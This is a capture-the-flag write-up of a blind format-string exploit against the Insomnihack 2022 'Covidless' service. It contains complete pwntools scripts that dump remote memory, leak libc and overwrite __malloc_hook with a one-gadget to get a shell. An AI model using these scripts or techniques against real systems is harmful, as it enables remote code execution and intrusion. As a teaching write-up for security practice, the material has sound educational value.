Blind

It's possible to pwn a binary with a format strings vulnerability without even having access to a local copy of it, by leaking some important data remotely.

For this example I'll use the Covidless challenge from Insomnihack teaser 2022.

Files

Format strings

The challenge only provided an IP and a port for us to connect to.

Once we connect we can interact with the program remotely and a simple test reveals there is a format strings vulnerability.

Arbitrary read

With a format strings vulnerability we can make printf access values on the stack and either print them as pointers or (hexa)decimal numbers using %p, %x, %d, etc., or treat them as pointers and read the data they point to using %s. The best way to turn this into an arb read is to make printf use the buffer that holds our own input as the pointer; that way we can make it leak the value at any address we want. Notice that we can use %<index>$<formatter> in our payloads to select an index, so we control which position of the stack the formatter accesses.

This payload accesses AAAABBBB on the stack and prints it as a pointer. If we replace %p with %s, printf will try to read data at 0x4242424241414141, which should give us a segfault.
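To see why AAAABBBB turns into 0x4242424241414141, here is a minimal sketch (Python 3, standard library only, unlike the Python 2 pwntools scripts in this post). It decodes the eight input bytes as a little-endian 64-bit value, which is how printf fetches them from the stack on x86-64. The helper name as_stack_qword is made up for illustration.

```python
import struct

def as_stack_qword(data):
    """Interpret 8 input bytes as the 64-bit value printf would fetch."""
    return struct.unpack("<Q", data)[0]

# 'A' is 0x41 and 'B' is 0x42; the first byte ends up least significant
print(hex(as_stack_qword(b"AAAABBBB")))  # 0x4242424241414141
```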

We can use this payload, replacing AAAABBBB with a valid address, to leak any data we want. Notice that the value we want to follow as a pointer must go at the end of the payload, because printf stops processing the format string at the first null byte and addresses are likely to contain them. Our input is also cut at \n (most likely by whatever reads the input rather than by printf itself), which means we cannot read data at an address that contains a 0x0a byte.
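The layout described above can be sketched as a small payload builder (Python 3, standard library only). It assumes our input buffer starts at stack index 12, which is inferred from the %14$s payloads used in the scripts in this post. build_read_payload and BUF_INDEX are hypothetical names, and the index would have to be found by testing on another target.

```python
import struct

BUF_INDEX = 12    # assumption: stack index where our input buffer starts
PREFIX_LEN = 16   # two 8-byte stack slots reserved for the format string

def build_read_payload(addr, buf_index=BUF_INDEX):
    """Format string first, padding, then the address as the last 8 bytes."""
    raw = struct.pack("<Q", addr)
    if b"\n" in raw:
        raise ValueError("address contains 0x0a and cannot be sent")
    # The pointer sits PREFIX_LEN bytes into the buffer, i.e. 2 slots later
    spec = "%{}$s".format(buf_index + PREFIX_LEN // 8).encode()
    return spec.ljust(PREFIX_LEN, b"#") + raw

print(build_read_payload(0x601018))
```

The null bytes of the address only appear after the formatter, so printf has already parsed %14$s by the time it hits them.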

Leaking libc (quick n dirty)

Whenever we want to get the GOT offsets to leak libc addresses, we usually use a local copy of the binary to do so, but this time we don't really have one. In this case we can either leak the whole binary or make some educated guesses and make our lives easier. :)

The leaks at 0x400000 reveal that this is an x86-64 ELF binary with no PIE. It's known that if a binary is Partial RELRO instead of Full RELRO (which we don't know for sure yet, but we will suppose it is), the GOT will be at the start of the RW segment, which goes right after the read-only segment at ELF base + 0x200000. We can use another no-PIE, Partial RELRO, x86-64 ELF binary to compare the offsets.

          0x400000           0x401000 r-xp     1000 0      /home/xten/Documents/ctf/htb/challenges/completed/ropme/ropme
          0x600000           0x601000 r--p     1000 0      /home/xten/Documents/ctf/htb/challenges/completed/ropme/ropme
          0x601000           0x602000 rw-p     1000 1000   /home/xten/Documents/ctf/htb/challenges/completed/ropme/ropme
          0x602000           0x623000 rw-p    21000 0      [heap]

We can start leaking at 0x601000, and if our guess about the "RELROness" of this binary is right, we will likely get some libc-looking addresses.

#!/usr/bin/env python2
from pwn import *

# Definitions
io = remote('covidless.insomnihack.ch',6666)

# Exploit
def pwn():
    with open('got','a') as f:
        addr = 0x601000
        while True:
            if addr >= 0x601100:
                break

            log.success(hex(addr))
            raw_addr = p64(addr)

            # Ignore \n (printf)
            if '\n' in raw_addr:
                f.write('\x00')
                addr += 1
                continue

            # Send fmt
            io.recvrepeat(0.1)
            io.sendline('%14$s###########'+raw_addr)

            # Parse (%s stops at the null terminator, so put exactly one back)
            out = io.recvuntil('###########').split('###########')[0]
            out = out.split('Your covid pass is invalid : ')[1]+'\x00'
            io.recvrepeat(0.1)

            # Append and repeat
            l = len(out)
            if l == 0:
                f.write('\x00')
                addr += 1
            else:
                print('Leak: ' + hex(u64(out.ljust(8,'\x00'))))
                f.write(out)

                addr += l
       
pwn()
io.interactive()

And the leaks don't look bad at all!

It's very likely that we are reading the GOT. The offsets of the GOT entries are fairly predictable, and we can again use another binary for comparison.

If the offsets match (which is very likely), we can expect the leak at 0x601018 to be the libc address of puts (this is also not 100%, btw). We can then feed this leak to a libc database to confirm it and get the exact libc version.
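The 0x601018 guess follows from the usual .got.plt layout on x86-64: the first three 8-byte entries are reserved for the dynamic linker, so the first imported function lands 0x18 bytes in. Here is a small sketch of that arithmetic (Python 3). It assumes .got.plt really starts at 0x601000, which is still a guess at this point, and got_slot is a hypothetical helper.

```python
GOT_PLT = 0x601000     # assumption: start of .got.plt in the remote binary
RESERVED_ENTRIES = 3   # .dynamic address, link_map, runtime resolver
ENTRY_SIZE = 8         # one pointer per entry on x86-64

def got_slot(n, got_plt=GOT_PLT):
    """Address of the n-th imported function's GOT entry (0-based)."""
    return got_plt + (RESERVED_ENTRIES + n) * ENTRY_SIZE

for n in range(4):
    print(n, hex(got_slot(n)))
```

Which function owns which slot still depends on the import order of the binary, so the first slot being puts remains a guess until the libc database agrees.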

We found a pretty reliable match. Before moving on, though, if it's not obvious already: so far we have relied on very likely but not certain guesses, and this is why we have to triage our results at each step. A pretty easy way of testing whether our libc leak and version are right is to calculate the libc base, add the offset of the string /bin/sh, and then use the format strings vulnerability to leak the data at this address. If the resulting string is /bin/sh, we can confirm our leak and move on to exploit dev.
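The arithmetic behind this check can be sketched as follows (Python 3). The two offsets are the ones used in the scripts in this post, and the leaked value is made up for illustration. The page-alignment test is an extra sanity check added here, not something the original exploit performs, and libc_base_from_puts is a hypothetical helper.

```python
PUTS_OFFSET = 0x0809c0    # offset of puts in the matched libc (from this post)
BINSH_OFFSET = 0x1b3e9a   # offset of "/bin/sh" in the same libc (from this post)

def libc_base_from_puts(puts_leak):
    """Subtract the symbol offset; a real libc base is page aligned."""
    base = puts_leak - PUTS_OFFSET
    if base & 0xfff:
        raise ValueError("base is not page aligned: wrong libc or wrong symbol")
    return base

leak = 0x7f1234a809c0     # made-up leak, for illustration only
base = libc_base_from_puts(leak)
print(hex(base))                 # 0x7f1234a00000
print(hex(base + BINSH_OFFSET))  # 0x7f1234bb3e9a
```

A misaligned base is a cheap early hint that the guess is wrong, before spending a request on reading the /bin/sh string.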

#!/usr/bin/env python2
from pwn import *

# Definitions
libc = ELF('./libc.so.6',checksec=False)
io = remote('covidless.insomnihack.ch',6666)

# Dummy value to initialize puts
def dummy():
    io.recvrepeat(0.3)
    io.sendline('dummy')

# Read value at address
def fmt_str_read(addr):
    io.recvrepeat(0.3)
    io.sendline('%14$s###########'+p64(addr))
    out = io.recvuntil('###########').split('###########')[0]
    out = out.split('Your covid pass is invalid : ')[1]
    return out

# Leak puts@got and get libc base
def leak_libc():
    libc.address = u64(fmt_str_read(0x601018).ljust(8,'\x00')) - 0x0809c0
    log.success('Libc: ' + hex(libc.address))
   
# Exploit
def pwn():
    dummy()
    leak_libc()

    if fmt_str_read(libc.address+0x1b3e9a) == '/bin/sh':
        log.success('Libc matches!')
    else:
        log.warning('Libc doesnt match!')

    # Clean junk data
    io.recvrepeat(0.3)

pwn()
io.interactive()

Running this code confirms our leak.

Leaking libc (right way)

The method we used before is not 100% certain, so if it doesn't work at first, just dump the binary. The shortcut was meant to save time and effort, not to create even more. Leaking the binary is not difficult at all, it's just time consuming. Here is some code to leak the whole binary:

#!/usr/bin/env python2
from pwn import *

# Definitions
io = remote('covidless.insomnihack.ch',6666)

# Exploit
def pwn():
    with open('elf','a') as f:
        addr = 0x400000
        while True:

            log.success(hex(addr))
            raw_addr = p64(addr)

            # Ignore \n (printf)
            if '\n' in raw_addr[:7]:
                f.write('\x00')
                addr += 1
                continue

            # Send fmt
            io.recvrepeat(0.1)
            io.sendline('%14$s###########'+raw_addr)

            # Parse
            out = io.recvuntil('###########').split('###########')[0]+'\x00'
            out = out.split('Your covid pass is invalid : ')[1]
            out = out.split('###########')[0]
            io.recvrepeat(0.1)

            # Append and repeat
            l = len(out)
            if l == 0:
                f.write('\x00')
                addr += 1
            else:
                print('Leak: ' + out)
                f.write(out)

                addr += l
     
pwn()
io.interactive()

Basically, you use the arb read primitive to read from 0x400000 until the program crashes with a segfault, which means you've dumped the entire memory segment and started poking at unmapped memory.

The upside of leaking the whole binary is that once you've dumped it you can just check the symbols and get the correct addresses without doing ANY guessing at all.
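The reassembly logic of such a dump can be tried offline. The sketch below (Python 3, standard library only) replaces the remote with a fake leak function that behaves like %s, returning bytes up to the next null. dump and make_fake_leak are hypothetical names, the sample bytes are made up, and an explicit end address is used instead of waiting for a crash.

```python
import struct

def dump(leak, start, end):
    """Rebuild the bytes in [start, end) from a %s-style leak primitive."""
    out = bytearray()
    addr = start
    while addr < end:
        if b"\n" in struct.pack("<Q", addr):
            out.append(0)             # address cannot be sent: placeholder
            addr += 1
            continue
        chunk = leak(addr) + b"\x00"  # %s stopped at a null, so put it back
        out += chunk
        addr += len(chunk)
    return bytes(out[:end - start])

def make_fake_leak(memory, base):
    """Stand-in for the remote: returns bytes up to the next null byte."""
    def leak(addr):
        off = addr - base
        stop = memory.find(b"\x00", off)
        return memory[off:] if stop == -1 else memory[off:stop]
    return leak

BASE = 0x400000
memory = b"\x7fELF\x02\x01\x01\x00\x00\x00AB\x00C"   # made-up sample bytes
dumped = dump(make_fake_leak(memory, BASE), BASE, BASE + len(memory))
print(dumped)
```

In this run the byte at 0x40000a comes back as a placeholder null, because that address itself contains 0x0a and can never be requested directly. Such a byte is only recovered when an earlier read happens to run across it.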

Now we can just read whatever is at 0x601018 and know that it will be the address of puts.

Arbitrary write

There is a very interesting formatter we can use to achieve arbitrary write, and that is %n. This formatter takes a pointer and stores in it the number of characters printed so far, that is, everything that precedes %n in the formatted output. Therefore, code that looks like this:

printf("AAAA%n", &count);

Would store 4 in count, since 4 is the number of characters before %n in the formatted string. Controlling the written value this way would usually require us to be able to send very large payloads, but we are limited to a maximum of 107 bytes of padding (not including the formatter and the pointer), which would limit us to bytes in the range of 0-107. There is a neat way to compress our payloads, though, by combining %n with another formatter. We can use %<char><count><formatter> to pad the value accessed by the formatter with char up to count characters in the formatted string, without actually having to write those bytes to the original string. Here is an example:

A specifier such as %020x prints the value accessed by %x padded with 0's to a total width of 20 characters, so the padding that precedes %n can be bigger than 107. This payload still has limitations though: the output is never shorter than the value itself, so we can't send 0 characters before %n with this method and would be limited to the range of 6-255 (6 is the size of "400934"). But if we combine the conventional payload with the compressed payload and make our exploit switch between them as needed, we can make %n write any value from 0-255, allowing us to write any byte we want at any address we want.
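The two payload shapes can be compared side by side in a short sketch (Python 3, standard library only). It assumes the input buffer starts at stack index 12, as inferred from the %14$ and %26$ indexes in this post's scripts. build_write_byte_payload and pointer_index are hypothetical helpers. Python's % operator pads the same way as printf for this specifier, so it is used to show the width semantics.

```python
import struct

BUF_INDEX = 12   # assumption: stack index where our input buffer starts
MAX_PAD = 107    # largest count reachable with literal padding

def build_write_byte_payload(addr, byte, buf_index=BUF_INDEX):
    """Pick the literal-padding or the width-padding form depending on byte."""
    raw = struct.pack("<Q", addr)
    if byte <= MAX_PAD:
        # `byte` literal chars, then %n, then filler up to 112 bytes (14 slots)
        spec = "%{}$n".format(buf_index + 14).encode()
        prefix = (b"A" * byte + spec).ljust(112, b"A")
    else:
        # the width makes printf emit `byte` chars; prefix fills 2 slots
        spec = "%0{}x%{}$n".format(byte, buf_index + 2).encode()
        prefix = spec.ljust(16, b"#")
    return prefix + raw

def pointer_index(payload, buf_index=BUF_INDEX):
    """Stack index at which the trailing 8-byte address ends up."""
    return buf_index + (len(payload) - 8) // 8

padded = "%020x" % 0x400934
print(padded, len(padded))   # 00000000000000400934 20
print(build_write_byte_payload(0x601018, 200))
```

Everything placed after %n is only filler to keep the address on an 8-byte boundary; it does not change the value that gets stored.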

Final exploit

With our arb read/write primitives constructed, we can use them to overwrite __malloc_hook with a one-gadget and then send a formatter that produces a very big formatted string, causing printf to call malloc.
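Before pointing the write primitive at a hook, it helps to see what a sequence of single-byte %n writes does to memory. The sketch below (Python 3, standard library only) simulates it on a local bytearray. The addresses and the target value are made up, and write_plan and simulate are hypothetical helpers. The one behavior it relies on is that plain %n stores a whole int, which is 4 bytes on x86-64.

```python
import struct

def write_plan(addr, value):
    """One (address, byte) pair per byte of a 64-bit value, lowest first."""
    return [(addr + i, b) for i, b in enumerate(struct.pack("<Q", value))]

def simulate(plan, memory, base):
    """Apply each write the way plain %n would: as a 4-byte int store."""
    for addr, byte in plan:
        off = addr - base
        memory[off:off + 4] = struct.pack("<I", byte)
    return memory

base = 0x1000                    # made-up address of the target qword
mem = bytearray(b"\xff" * 16)    # made-up previous contents
target = 0x7f1234a4f322          # made-up libc base 0x7f1234a00000 + 0x4f322
simulate(write_plan(base, target), mem, base)
print(mem.hex())                 # 22f3a434127f0000000000ffffffffff
```

Each write zeroes the three bytes after it, and the next write fixes the first of them, so going from the lowest address upward yields the right 8 bytes. The last write still clears the three bytes that follow the target.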

#!/usr/bin/env python2
from pwn import *

# Definitions
libc = ELF('./libc.so.6',checksec=False)
io = remote('covidless.insomnihack.ch',6666)

# Dummy value to initialize puts
def dummy():
    io.recvrepeat(0.3)
    io.sendline('dummy')

# Read value at address
def fmt_str_read(addr):
    io.recvrepeat(0.3)
    io.sendline('%14$s###########'+p64(addr))
    out = io.recvuntil('###########').split('###########')[0]
    out = out.split('Your covid pass is invalid : ')[1]
    return out

# Overwrite a single byte
def fmt_str_write_byte(addr, byte):
    if byte <= 107:
        pad = 107 - byte        
        payload = 'A'*byte+'%26$n'+'A'*pad+p64(addr)
    else:
        payload = '%0'+str(byte)+'x%14$n#####'+p64(addr)

    io.recvrepeat(0.3)
    io.sendline(payload)
    io.recvrepeat(0.3)


# Overwrite data at address
def fmt_str_write(addr, value):
    for c in value:
        fmt_str_write_byte(addr, ord(c))
        addr += 1

# Leak puts@got and get libc base
def leak_libc():
    libc.address = u64(fmt_str_read(0x601018).ljust(8,'\x00')) - 0x0809c0
    log.success('Libc: ' + hex(libc.address))
   
# Exploit
def pwn():
    dummy()
    leak_libc()

    # Overwrite __malloc_hook w/ onegadget and force printf to malloc
    fmt_str_write(libc.sym['__malloc_hook'],p64(libc.address+0x4f322))
    io.sendline('%10000000c')

    # Clean junk data
    io.recvrepeat(0.3)

pwn()
io.interactive()

The purpose of this post is to demonstrate that dumping the entire binary is not the only way (and most times not the best way) to get enough information to develop an exploit for a blind format string vulnerability, and to show an easy way to build an arbitrary read/write interface out of these bugs.

Thanks, gabrielbezerra and R3tr074, for solving this challenge with me :D
